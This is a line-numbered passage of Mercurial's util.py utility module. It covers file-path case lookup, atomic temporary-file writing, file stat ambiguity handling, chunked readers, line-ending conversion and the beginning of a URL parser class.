1922 1920 @propertycache
1923 1921 def escape(self):
1924 1922 '''Return the version of escape corresponding to self.compile.
1925 1923
1926 1924 This is imperfect because whether re2 or re is used for a particular
1927 1925 function depends on the flags, etc, but it's the best we can do.
1928 1926 '''
1929 1927 global _re2
1930 1928 if _re2 is None:
1931 1929 self._checkre2()
1932 1930 if _re2:
1933 1931 return re2.escape
1934 1932 else:
1935 1933 return remod.escape
1936 1934
1937 1935 re = _re()
1938 1936
1939 1937 _fspathcache = {}
1940 1938 def fspath(name, root):
1941 1939 '''Get name in the case stored in the filesystem
1942 1940
1943 1941 The name should be relative to root, and be normcase-ed for efficiency.
1944 1942
1945 1943 Note that this function is unnecessary, and should not be
1946 1944 called, for case-sensitive filesystems (simply because it's expensive).
1947 1945
1948 1946 The root should be normcase-ed, too.
1949 1947 '''
1950 1948 def _makefspathcacheentry(dir):
1951 1949 return dict((normcase(n), n) for n in os.listdir(dir))
1952 1950
1953 1951 seps = pycompat.ossep
1954 1952 if pycompat.osaltsep:
1955 1953 seps = seps + pycompat.osaltsep
1956 1954 # Protect backslashes. This gets silly very quickly.
1957 1955 seps.replace('\\','\\\\')
1958 1956 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1959 1957 dir = os.path.normpath(root)
1960 1958 result = []
1961 1959 for part, sep in pattern.findall(name):
1962 1960 if sep:
1963 1961 result.append(sep)
1964 1962 continue
1965 1963
1966 1964 if dir not in _fspathcache:
1967 1965 _fspathcache[dir] = _makefspathcacheentry(dir)
1968 1966 contents = _fspathcache[dir]
1969 1967
1970 1968 found = contents.get(part)
1971 1969 if not found:
1972 1970 # retry "once per directory" per "dirstate.walk" which
1973 1971 # may take place for each patches of "hg qpush", for example
1974 1972 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1975 1973 found = contents.get(part)
1976 1974
1977 1975 result.append(found or part)
1978 1976 dir = os.path.join(dir, part)
1979 1977
1980 1978 return ''.join(result)
1981 1979
1982 1980 def checknlink(testfile):
1983 1981 '''check whether hardlink count reporting works properly'''
1984 1982
1985 1983 # testfile may be open, so we need a separate file for checking to
1986 1984 # work around issue2543 (or testfile may get lost on Samba shares)
1987 1985 f1, f2, fp = None, None, None
1988 1986 try:
1989 1987 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1990 1988 suffix='1~', dir=os.path.dirname(testfile))
1991 1989 os.close(fd)
1992 1990 f2 = '%s2~' % f1[:-2]
1993 1991
1994 1992 oslink(f1, f2)
1995 1993 # nlinks() may behave differently for files on Windows shares if
1996 1994 # the file is open.
1997 1995 fp = posixfile(f2)
1998 1996 return nlinks(f2) > 1
1999 1997 except OSError:
2000 1998 return False
2001 1999 finally:
2002 2000 if fp is not None:
2003 2001 fp.close()
2004 2002 for f in (f1, f2):
2005 2003 try:
2006 2004 if f is not None:
2007 2005 os.unlink(f)
2008 2006 except OSError:
2009 2007 pass
2010 2008
2011 2009 def endswithsep(path):
2012 2010 '''Check path ends with os.sep or os.altsep.'''
2013 2011 return (path.endswith(pycompat.ossep)
2014 2012 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2015 2013
2016 2014 def splitpath(path):
2017 2015 '''Split path by os.sep.
2018 2016 Note that this function does not use os.altsep because this is
2019 2017 an alternative of simple "xxx.split(os.sep)".
2020 2018 It is recommended to use os.path.normpath() before using this
2021 2019 function if need.'''
2022 2020 return path.split(pycompat.ossep)
2023 2021
2024 2022 def mktempcopy(name, emptyok=False, createmode=None):
2025 2023 """Create a temporary file with the same contents from name
2026 2024
2027 2025 The permission bits are copied from the original file.
2028 2026
2029 2027 If the temporary file is going to be truncated immediately, you
2030 2028 can use emptyok=True as an optimization.
2031 2029
2032 2030 Returns the name of the temporary file.
2033 2031 """
2034 2032 d, fn = os.path.split(name)
2035 2033 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2036 2034 os.close(fd)
2037 2035 # Temporary files are created with mode 0600, which is usually not
2038 2036 # what we want. If the original file already exists, just copy
2039 2037 # its mode. Otherwise, manually obey umask.
2040 2038 copymode(name, temp, createmode)
2041 2039 if emptyok:
2042 2040 return temp
2043 2041 try:
2044 2042 try:
2045 2043 ifp = posixfile(name, "rb")
2046 2044 except IOError as inst:
2047 2045 if inst.errno == errno.ENOENT:
2048 2046 return temp
2049 2047 if not getattr(inst, 'filename', None):
2050 2048 inst.filename = name
2051 2049 raise
2052 2050 ofp = posixfile(temp, "wb")
2053 2051 for chunk in filechunkiter(ifp):
2054 2052 ofp.write(chunk)
2055 2053 ifp.close()
2056 2054 ofp.close()
2057 2055 except: # re-raises
2058 2056 try:
2059 2057 os.unlink(temp)
2060 2058 except OSError:
2061 2059 pass
2062 2060 raise
2063 2061 return temp
2064 2062
2065 2063 class filestat(object):
2066 2064 """help to exactly detect change of a file
2067 2065
2068 2066 'stat' attribute is result of 'os.stat()' if specified 'path'
2069 2067 exists. Otherwise, it is None. This can avoid preparative
2070 2068 'exists()' examination on client side of this class.
2071 2069 """
2072 2070 def __init__(self, stat):
2073 2071 self.stat = stat
2074 2072
2075 2073 @classmethod
2076 2074 def frompath(cls, path):
2077 2075 try:
2078 2076 stat = os.stat(path)
2079 2077 except OSError as err:
2080 2078 if err.errno != errno.ENOENT:
2081 2079 raise
2082 2080 stat = None
2083 2081 return cls(stat)
2084 2082
2085 2083 @classmethod
2086 2084 def fromfp(cls, fp):
2087 2085 stat = os.fstat(fp.fileno())
2088 2086 return cls(stat)
2089 2087
2090 2088 __hash__ = object.__hash__
2091 2089
2092 2090 def __eq__(self, old):
2093 2091 try:
2094 2092 # if ambiguity between stat of new and old file is
2095 2093 # avoided, comparison of size, ctime and mtime is enough
2096 2094 # to exactly detect change of a file regardless of platform
2097 2095 return (self.stat.st_size == old.stat.st_size and
2098 2096 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2099 2097 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2100 2098 except AttributeError:
2101 2099 pass
2102 2100 try:
2103 2101 return self.stat is None and old.stat is None
2104 2102 except AttributeError:
2105 2103 return False
2106 2104
2107 2105 def isambig(self, old):
2108 2106 """Examine whether new (= self) stat is ambiguous against old one
2109 2107
2110 2108 "S[N]" below means stat of a file at N-th change:
2111 2109
2112 2110 - S[n-1].ctime < S[n].ctime: can detect change of a file
2113 2111 - S[n-1].ctime == S[n].ctime
2114 2112 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2115 2113 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2116 2114 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2117 2115 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2118 2116
2119 2117 Case (*2) above means that a file was changed twice or more at
2120 2118 same time in sec (= S[n-1].ctime), and comparison of timestamp
2121 2119 is ambiguous.
2122 2120
2123 2121 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2124 2122 timestamp is ambiguous".
2125 2123
2126 2124 But advancing mtime only in case (*2) doesn't work as
2127 2125 expected, because naturally advanced S[n].mtime in case (*1)
2128 2126 might be equal to manually advanced S[n-1 or earlier].mtime.
2129 2127
2130 2128 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2131 2129 treated as ambiguous regardless of mtime, to avoid overlooking
2132 2130 by confliction between such mtime.
2133 2131
2134 2132 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2135 2133 S[n].mtime", even if size of a file isn't changed.
2136 2134 """
2137 2135 try:
2138 2136 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2139 2137 except AttributeError:
2140 2138 return False
2141 2139
2142 2140 def avoidambig(self, path, old):
2143 2141 """Change file stat of specified path to avoid ambiguity
2144 2142
2145 2143 'old' should be previous filestat of 'path'.
2146 2144
2147 2145 This skips avoiding ambiguity, if a process doesn't have
2148 2146 appropriate privileges for 'path'. This returns False in this
2149 2147 case.
2150 2148
2151 2149 Otherwise, this returns True, as "ambiguity is avoided".
2152 2150 """
2153 2151 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2154 2152 try:
2155 2153 os.utime(path, (advanced, advanced))
2156 2154 except OSError as inst:
2157 2155 if inst.errno == errno.EPERM:
2158 2156 # utime() on the file created by another user causes EPERM,
2159 2157 # if a process doesn't have appropriate privileges
2160 2158 return False
2161 2159 raise
2162 2160 return True
2163 2161
2164 2162 def __ne__(self, other):
2165 2163 return not self == other
2166 2164
2167 2165 class atomictempfile(object):
2168 2166 '''writable file object that atomically updates a file
2169 2167
2170 2168 All writes will go to a temporary copy of the original file. Call
2171 2169 close() when you are done writing, and atomictempfile will rename
2172 2170 the temporary copy to the original name, making the changes
2173 2171 visible. If the object is destroyed without being closed, all your
2174 2172 writes are discarded.
2175 2173
2176 2174 checkambig argument of constructor is used with filestat, and is
2177 2175 useful only if target file is guarded by any lock (e.g. repo.lock
2178 2176 or repo.wlock).
2179 2177 '''
2180 2178 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2181 2179 self.__name = name # permanent name
2182 2180 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2183 2181 createmode=createmode)
2184 2182 self._fp = posixfile(self._tempname, mode)
2185 2183 self._checkambig = checkambig
2186 2184
2187 2185 # delegated methods
2188 2186 self.read = self._fp.read
2189 2187 self.write = self._fp.write
2190 2188 self.seek = self._fp.seek
2191 2189 self.tell = self._fp.tell
2192 2190 self.fileno = self._fp.fileno
2193 2191
2194 2192 def close(self):
2195 2193 if not self._fp.closed:
2196 2194 self._fp.close()
2197 2195 filename = localpath(self.__name)
2198 2196 oldstat = self._checkambig and filestat.frompath(filename)
2199 2197 if oldstat and oldstat.stat:
2200 2198 rename(self._tempname, filename)
2201 2199 newstat = filestat.frompath(filename)
2202 2200 if newstat.isambig(oldstat):
2203 2201 # stat of changed file is ambiguous to original one
2204 2202 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2205 2203 os.utime(filename, (advanced, advanced))
2206 2204 else:
2207 2205 rename(self._tempname, filename)
2208 2206
2209 2207 def discard(self):
2210 2208 if not self._fp.closed:
2211 2209 try:
2212 2210 os.unlink(self._tempname)
2213 2211 except OSError:
2214 2212 pass
2215 2213 self._fp.close()
2216 2214
2217 2215 def __del__(self):
2218 2216 if safehasattr(self, '_fp'): # constructor actually did something
2219 2217 self.discard()
2220 2218
2221 2219 def __enter__(self):
2222 2220 return self
2223 2221
2224 2222 def __exit__(self, exctype, excvalue, traceback):
2225 2223 if exctype is not None:
2226 2224 self.discard()
2227 2225 else:
2228 2226 self.close()
2229 2227
2230 2228 def unlinkpath(f, ignoremissing=False, rmdir=True):
2231 2229 """unlink and remove the directory if it is empty"""
2232 2230 if ignoremissing:
2233 2231 tryunlink(f)
2234 2232 else:
2235 2233 unlink(f)
2236 2234 if rmdir:
2237 2235 # try removing directories that might now be empty
2238 2236 try:
2239 2237 removedirs(os.path.dirname(f))
2240 2238 except OSError:
2241 2239 pass
2242 2240
2243 2241 def tryunlink(f):
2244 2242 """Attempt to remove a file, ignoring ENOENT errors."""
2245 2243 try:
2246 2244 unlink(f)
2247 2245 except OSError as e:
2248 2246 if e.errno != errno.ENOENT:
2249 2247 raise
2250 2248
2251 2249 def makedirs(name, mode=None, notindexed=False):
2252 2250 """recursive directory creation with parent mode inheritance
2253 2251
2254 2252 Newly created directories are marked as "not to be indexed by
2255 2253 the content indexing service", if ``notindexed`` is specified
2256 2254 for "write" mode access.
2257 2255 """
2258 2256 try:
2259 2257 makedir(name, notindexed)
2260 2258 except OSError as err:
2261 2259 if err.errno == errno.EEXIST:
2262 2260 return
2263 2261 if err.errno != errno.ENOENT or not name:
2264 2262 raise
2265 2263 parent = os.path.dirname(os.path.abspath(name))
2266 2264 if parent == name:
2267 2265 raise
2268 2266 makedirs(parent, mode, notindexed)
2269 2267 try:
2270 2268 makedir(name, notindexed)
2271 2269 except OSError as err:
2272 2270 # Catch EEXIST to handle races
2273 2271 if err.errno == errno.EEXIST:
2274 2272 return
2275 2273 raise
2276 2274 if mode is not None:
2277 2275 os.chmod(name, mode)
2278 2276
2279 2277 def readfile(path):
2280 2278 with open(path, 'rb') as fp:
2281 2279 return fp.read()
2282 2280
2283 2281 def writefile(path, text):
2284 2282 with open(path, 'wb') as fp:
2285 2283 fp.write(text)
2286 2284
2287 2285 def appendfile(path, text):
2288 2286 with open(path, 'ab') as fp:
2289 2287 fp.write(text)
2290 2288
2291 2289 class chunkbuffer(object):
2292 2290 """Allow arbitrary sized chunks of data to be efficiently read from an
2293 2291 iterator over chunks of arbitrary size."""
2294 2292
2295 2293 def __init__(self, in_iter):
2296 2294 """in_iter is the iterator that's iterating over the input chunks."""
2297 2295 def splitbig(chunks):
2298 2296 for chunk in chunks:
2299 2297 if len(chunk) > 2**20:
2300 2298 pos = 0
2301 2299 while pos < len(chunk):
2302 2300 end = pos + 2 ** 18
2303 2301 yield chunk[pos:end]
2304 2302 pos = end
2305 2303 else:
2306 2304 yield chunk
2307 2305 self.iter = splitbig(in_iter)
2308 2306 self._queue = collections.deque()
2309 2307 self._chunkoffset = 0
2310 2308
2311 2309 def read(self, l=None):
2312 2310 """Read L bytes of data from the iterator of chunks of data.
2313 2311 Returns less than L bytes if the iterator runs dry.
2314 2312
2315 2313 If size parameter is omitted, read everything"""
2316 2314 if l is None:
2317 2315 return ''.join(self.iter)
2318 2316
2319 2317 left = l
2320 2318 buf = []
2321 2319 queue = self._queue
2322 2320 while left > 0:
2323 2321 # refill the queue
2324 2322 if not queue:
2325 2323 target = 2**18
2326 2324 for chunk in self.iter:
2327 2325 queue.append(chunk)
2328 2326 target -= len(chunk)
2329 2327 if target <= 0:
2330 2328 break
2331 2329 if not queue:
2332 2330 break
2333 2331
2334 2332 # The easy way to do this would be to queue.popleft(), modify the
2335 2333 # chunk (if necessary), then queue.appendleft(). However, for cases
2336 2334 # where we read partial chunk content, this incurs 2 dequeue
2337 2335 # mutations and creates a new str for the remaining chunk in the
2338 2336 # queue. Our code below avoids this overhead.
2339 2337
2340 2338 chunk = queue[0]
2341 2339 chunkl = len(chunk)
2342 2340 offset = self._chunkoffset
2343 2341
2344 2342 # Use full chunk.
2345 2343 if offset == 0 and left >= chunkl:
2346 2344 left -= chunkl
2347 2345 queue.popleft()
2348 2346 buf.append(chunk)
2349 2347 # self._chunkoffset remains at 0.
2350 2348 continue
2351 2349
2352 2350 chunkremaining = chunkl - offset
2353 2351
2354 2352 # Use all of unconsumed part of chunk.
2355 2353 if left >= chunkremaining:
2356 2354 left -= chunkremaining
2357 2355 queue.popleft()
2358 2356 # offset == 0 is enabled by block above, so this won't merely
2359 2357 # copy via ``chunk[0:]``.
2360 2358 buf.append(chunk[offset:])
2361 2359 self._chunkoffset = 0
2362 2360
2363 2361 # Partial chunk needed.
2364 2362 else:
2365 2363 buf.append(chunk[offset:offset + left])
2366 2364 self._chunkoffset += left
2367 2365 left -= chunkremaining
2368 2366
2369 2367 return ''.join(buf)
2370 2368
2371 2369 def filechunkiter(f, size=131072, limit=None):
2372 2370 """Create a generator that produces the data in the file size
2373 2371 (default 131072) bytes at a time, up to optional limit (default is
2374 2372 to read all data). Chunks may be less than size bytes if the
2375 2373 chunk is the last chunk in the file, or the file is a socket or
2376 2374 some other type of file that sometimes reads less data than is
2377 2375 requested."""
2378 2376 assert size >= 0
2379 2377 assert limit is None or limit >= 0
2380 2378 while True:
2381 2379 if limit is None:
2382 2380 nbytes = size
2383 2381 else:
2384 2382 nbytes = min(limit, size)
2385 2383 s = nbytes and f.read(nbytes)
2386 2384 if not s:
2387 2385 break
2388 2386 if limit:
2389 2387 limit -= len(s)
2390 2388 yield s
2391 2389
2392 2390 class cappedreader(object):
2393 2391 """A file object proxy that allows reading up to N bytes.
2394 2392
2395 2393 Given a source file object, instances of this type allow reading up to
2396 2394 N bytes from that source file object. Attempts to read past the allowed
2397 2395 limit are treated as EOF.
2398 2396
2399 2397 It is assumed that I/O is not performed on the original file object
2400 2398 in addition to I/O that is performed by this instance. If there is,
2401 2399 state tracking will get out of sync and unexpected results will ensue.
2402 2400 """
2403 2401 def __init__(self, fh, limit):
2404 2402 """Allow reading up to <limit> bytes from <fh>."""
2405 2403 self._fh = fh
2406 2404 self._left = limit
2407 2405
2408 2406 def read(self, n=-1):
2409 2407 if not self._left:
2410 2408 return b''
2411 2409
2412 2410 if n < 0:
2413 2411 n = self._left
2414 2412
2415 2413 data = self._fh.read(min(n, self._left))
2416 2414 self._left -= len(data)
2417 2415 assert self._left >= 0
2418 2416
2419 2417 return data
2420 2418
2421 2419 def readinto(self, b):
2422 2420 res = self.read(len(b))
2423 2421 if res is None:
2424 2422 return None
2425 2423
2426 2424 b[0:len(res)] = res
2427 2425 return len(res)
2428 2426
2429 2427 def unitcountfn(*unittable):
2430 2428 '''return a function that renders a readable count of some quantity'''
2431 2429
2432 2430 def go(count):
2433 2431 for multiplier, divisor, format in unittable:
2434 2432 if abs(count) >= divisor * multiplier:
2435 2433 return format % (count / float(divisor))
2436 2434 return unittable[-1][2] % count
2437 2435
2438 2436 return go
2439 2437
2440 2438 def processlinerange(fromline, toline):
2441 2439 """Check that linerange <fromline>:<toline> makes sense and return a
2442 2440 0-based range.
2443 2441
2444 2442 >>> processlinerange(10, 20)
2445 2443 (9, 20)
2446 2444 >>> processlinerange(2, 1)
2447 2445 Traceback (most recent call last):
2448 2446 ...
2449 2447 ParseError: line range must be positive
2450 2448 >>> processlinerange(0, 5)
2451 2449 Traceback (most recent call last):
2452 2450 ...
2453 2451 ParseError: fromline must be strictly positive
2454 2452 """
2455 2453 if toline - fromline < 0:
2456 2454 raise error.ParseError(_("line range must be positive"))
2457 2455 if fromline < 1:
2458 2456 raise error.ParseError(_("fromline must be strictly positive"))
2459 2457 return fromline - 1, toline
2460 2458
2461 2459 bytecount = unitcountfn(
2462 2460 (100, 1 << 30, _('%.0f GB')),
2463 2461 (10, 1 << 30, _('%.1f GB')),
2464 2462 (1, 1 << 30, _('%.2f GB')),
2465 2463 (100, 1 << 20, _('%.0f MB')),
2466 2464 (10, 1 << 20, _('%.1f MB')),
2467 2465 (1, 1 << 20, _('%.2f MB')),
2468 2466 (100, 1 << 10, _('%.0f KB')),
2469 2467 (10, 1 << 10, _('%.1f KB')),
2470 2468 (1, 1 << 10, _('%.2f KB')),
2471 2469 (1, 1, _('%.0f bytes')),
2472 2470 )
2473 2471
2474 2472 class transformingwriter(object):
2475 2473 """Writable file wrapper to transform data by function"""
2476 2474
2477 2475 def __init__(self, fp, encode):
2478 2476 self._fp = fp
2479 2477 self._encode = encode
2480 2478
2481 2479 def close(self):
2482 2480 self._fp.close()
2483 2481
2484 2482 def flush(self):
2485 2483 self._fp.flush()
2486 2484
2487 2485 def write(self, data):
2488 2486 return self._fp.write(self._encode(data))
2489 2487
2490 2488 # Matches a single EOL which can either be a CRLF where repeated CR
2491 2489 # are removed or a LF. We do not care about old Macintosh files, so a
2492 2490 # stray CR is an error.
2493 2491 _eolre = remod.compile(br'\r*\n')
2494 2492
2495 2493 def tolf(s):
2496 2494 return _eolre.sub('\n', s)
2497 2495
2498 2496 def tocrlf(s):
2499 2497 return _eolre.sub('\r\n', s)
2500 2498
2501 2499 def _crlfwriter(fp):
2502 2500 return transformingwriter(fp, tocrlf)
2503 2501
2504 2502 if pycompat.oslinesep == '\r\n':
2505 2503 tonativeeol = tocrlf
2506 2504 fromnativeeol = tolf
2507 2505 nativeeolwriter = _crlfwriter
2508 2506 else:
2509 2507 tonativeeol = pycompat.identity
2510 2508 fromnativeeol = pycompat.identity
2511 2509 nativeeolwriter = pycompat.identity
2512 2510
2513 2511 if (pyplatform.python_implementation() == 'CPython' and
2514 2512 sys.version_info < (3, 0)):
2515 2513 # There is an issue in CPython that some IO methods do not handle EINTR
2516 2514 # correctly. The following table shows what CPython version (and functions)
2517 2515 # are affected (buggy: has the EINTR bug, okay: otherwise):
2518 2516 #
2519 2517 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2520 2518 # --------------------------------------------------
2521 2519 # fp.__iter__ | buggy | buggy | okay
2522 2520 # fp.read* | buggy | okay [1] | okay
2523 2521 #
2524 2522 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2525 2523 #
2526 2524 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2527 2525 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2528 2526 #
2529 2527 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2530 2528 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2531 2529 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2532 2530 # fp.__iter__ but not other fp.read* methods.
2533 2531 #
2534 2532 # On modern systems like Linux, the "read" syscall cannot be interrupted
2535 2533 # when reading "fast" files like on-disk files. So the EINTR issue only
2536 2534 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2537 2535 # files approximately as "fast" files and use the fast (unsafe) code path,
2538 2536 # to minimize the performance impact.
2539 2537 if sys.version_info >= (2, 7, 4):
2540 2538 # fp.readline deals with EINTR correctly, use it as a workaround.
2541 2539 def _safeiterfile(fp):
2542 2540 return iter(fp.readline, '')
2543 2541 else:
2544 2542 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2545 2543 # note: this may block longer than necessary because of bufsize.
2546 2544 def _safeiterfile(fp, bufsize=4096):
2547 2545 fd = fp.fileno()
2548 2546 line = ''
2549 2547 while True:
2550 2548 try:
2551 2549 buf = os.read(fd, bufsize)
2552 2550 except OSError as ex:
2553 2551 # os.read only raises EINTR before any data is read
2554 2552 if ex.errno == errno.EINTR:
2555 2553 continue
2556 2554 else:
2557 2555 raise
2558 2556 line += buf
2559 2557 if '\n' in buf:
2560 2558 splitted = line.splitlines(True)
2561 2559 line = ''
2562 2560 for l in splitted:
2563 2561 if l[-1] == '\n':
2564 2562 yield l
2565 2563 else:
2566 2564 line = l
2567 2565 if not buf:
2568 2566 break
2569 2567 if line:
2570 2568 yield line
2571 2569
2572 2570 def iterfile(fp):
2573 2571 fastpath = True
2574 2572 if type(fp) is file:
2575 2573 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2576 2574 if fastpath:
2577 2575 return fp
2578 2576 else:
2579 2577 return _safeiterfile(fp)
2580 2578 else:
2581 2579 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2582 2580 def iterfile(fp):
2583 2581 return fp
2584 2582
2585 2583 def iterlines(iterator):
2586 2584 for chunk in iterator:
2587 2585 for line in chunk.splitlines():
2588 2586 yield line
2589 2587
2590 2588 def expandpath(path):
2591 2589 return os.path.expanduser(os.path.expandvars(path))
2592 2590
2593 2591 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2594 2592 """Return the result of interpolating items in the mapping into string s.
2595 2593
2596 2594 prefix is a single character string, or a two character string with
2597 2595 a backslash as the first character if the prefix needs to be escaped in
2598 2596 a regular expression.
2599 2597
2600 2598 fn is an optional function that will be applied to the replacement text
2601 2599 just before replacement.
2602 2600
2603 2601 escape_prefix is an optional flag that allows using doubled prefix for
2604 2602 its escaping.
2605 2603 """
2606 2604 fn = fn or (lambda s: s)
2607 2605 patterns = '|'.join(mapping.keys())
2608 2606 if escape_prefix:
2609 2607 patterns += '|' + prefix
2610 2608 if len(prefix) > 1:
2611 2609 prefix_char = prefix[1:]
2612 2610 else:
2613 2611 prefix_char = prefix
2614 2612 mapping[prefix_char] = prefix_char
2615 2613 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2616 2614 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2617 2615
2618 2616 def getport(port):
2619 2617 """Return the port for a given network service.
2620 2618
2621 2619 If port is an integer, it's returned as is. If it's a string, it's
2622 2620 looked up using socket.getservbyname(). If there's no matching
2623 2621 service, error.Abort is raised.
2624 2622 """
2625 2623 try:
2626 2624 return int(port)
2627 2625 except ValueError:
2628 2626 pass
2629 2627
2630 2628 try:
2631 2629 return socket.getservbyname(pycompat.sysstr(port))
2632 2630 except socket.error:
2633 2631 raise error.Abort(_("no port number associated with service '%s'")
2634 2632 % port)
2635 2633
2636 2634 class url(object):
2637 2635 r"""Reliable URL parser.
2638 2636
2639 2637 This parses URLs and provides attributes for the following
2640 2638 components:
2641 2639
2642 2640 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2643 2641
2644 2642 Missing components are set to None. The only exception is
2645 2643 fragment, which is set to '' if present but empty.
2646 2644
2647 2645 If parsefragment is False, fragment is included in query. If
2648 2646 parsequery is False, query is included in path. If both are
2649 2647 False, both fragment and query are included in path.
2650 2648
2651 2649 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2652 2650
2653 2651 Note that for backward compatibility reasons, bundle URLs do not
2654 2652 take host names. That means 'bundle://../' has a path of '../'.
2655 2653
2656 2654 Examples:
2657 2655
2658 2656 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2659 2657 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2660 2658 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2661 2659 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2662 2660 >>> url(b'file:///home/joe/repo')
2663 2661 <url scheme: 'file', path: '/home/joe/repo'>
2664 2662 >>> url(b'file:///c:/temp/foo/')
2665 2663 <url scheme: 'file', path: 'c:/temp/foo/'>
2666 2664 >>> url(b'bundle:foo')
2667 2665 <url scheme: 'bundle', path: 'foo'>
2668 2666 >>> url(b'bundle://../foo')
2669 2667 <url scheme: 'bundle', path: '../foo'>
2670 2668 >>> url(br'c:\foo\bar')
2671 2669 <url path: 'c:\\foo\\bar'>
2672 2670 >>> url(br'\\blah\blah\blah')
2673 2671 <url path: '\\\\blah\\blah\\blah'>
2674 2672 >>> url(br'\\blah\blah\blah#baz')
2675 2673 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2676 2674 >>> url(br'file:///C:\users\me')
2677 2675 <url scheme: 'file', path: 'C:\\users\\me'>
2678 2676
2679 2677 Authentication credentials:
2680 2678
2681 2679 >>> url(b'ssh://joe:xyz@x/repo')
2682 2680 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2683 2681 >>> url(b'ssh://joe@x/repo')
2684 2682 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2685 2683
2686 2684 Query strings and fragments:
2687 2685
2688 2686 >>> url(b'http://host/a?b#c')
2689 2687 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2690 2688 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2691 2689 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2692 2690
2693 2691 Empty path:
2694 2692
2695 2693 >>> url(b'')
2696 2694 <url path: ''>
2697 2695 >>> url(b'#a')
2698 2696 <url path: '', fragment: 'a'>
2699 2697 >>> url(b'http://host/')
2700 2698 <url scheme: 'http', host: 'host', path: ''>
2701 2699 >>> url(b'http://host/#a')
2702 2700 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2703 2701
2704 2702 Only scheme:
2705 2703
2706 2704 >>> url(b'http:')
2707 2705 <url scheme: 'http'>
2708 2706 """
2709 2707
2710 2708 _safechars = "!~*'()+"
2711 2709 _safepchars = "/!~*'()+:\\"
2712 2710 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2713 2711
2714 2712 def __init__(self, path, parsequery=True, parsefragment=True):
2715 2713 # We slowly chomp away at path until we have only the path left
2716 2714 self.scheme = self.user = self.passwd = self.host = None
2717 2715 self.port = self.path = self.query = self.fragment = None
2718 2716 self._localpath = True
2719 2717 self._hostport = ''
2720 2718 self._origpath = path
2721 2719
2722 2720 if parsefragment and '#' in path:
2723 2721 path, self.fragment = path.split('#', 1)
2724 2722
2725 2723 # special case for Windows drive letters and UNC paths
2726 2724 if hasdriveletter(path) or path.startswith('\\\\'):
2727 2725 self.path = path
2728 2726 return
2729 2727
2730 2728 # For compatibility reasons, we can't handle bundle paths as
2731 2729 # normal URLS
2732 2730 if path.startswith('bundle:'):
2733 2731 self.scheme = 'bundle'
2734 2732 path = path[7:]
2735 2733 if path.startswith('//'):
2736 2734 path = path[2:]
2737 2735 self.path = path
2738 2736 return
2739 2737
2740 2738 if self._matchscheme(path):
2741 2739 parts = path.split(':', 1)
2742 2740 if parts[0]:
2743 2741 self.scheme, path = parts
2744 2742 self._localpath = False
2745 2743
2746 2744 if not path:
2747 2745 path = None
2748 2746 if self._localpath:
2749 2747 self.path = ''
2750 2748 return
2751 2749 else:
2752 2750 if self._localpath:
2753 2751 self.path = path
2754 2752 return
2755 2753
2756 2754 if parsequery and '?' in path:
2757 2755 path, self.query = path.split('?', 1)
2758 2756 if not path:
2759 2757 path = None
2760 2758 if not self.query:
2761 2759 self.query = None
2762 2760
2763 2761 # // is required to specify a host/authority
2764 2762 if path and path.startswith('//'):
2765 2763 parts = path[2:].split('/', 1)
2766 2764 if len(parts) > 1:
2767 2765 self.host, path = parts
2768 2766 else:
2769 2767 self.host = parts[0]
2770 2768 path = None
2771 2769 if not self.host:
2772 2770 self.host = None
2773 2771 # path of file:///d is /d
2774 2772 # path of file:///d:/ is d:/, not /d:/
2775 2773 if path and not hasdriveletter(path):
2776 2774 path = '/' + path
2777 2775
2778 2776 if self.host and '@' in self.host:
2779 2777 self.user, self.host = self.host.rsplit('@', 1)
2780 2778 if ':' in self.user:
2781 2779 self.user, self.passwd = self.user.split(':', 1)
2782 2780 if not self.host:
2783 2781 self.host = None
2784 2782
2785 2783 # Don't split on colons in IPv6 addresses without ports
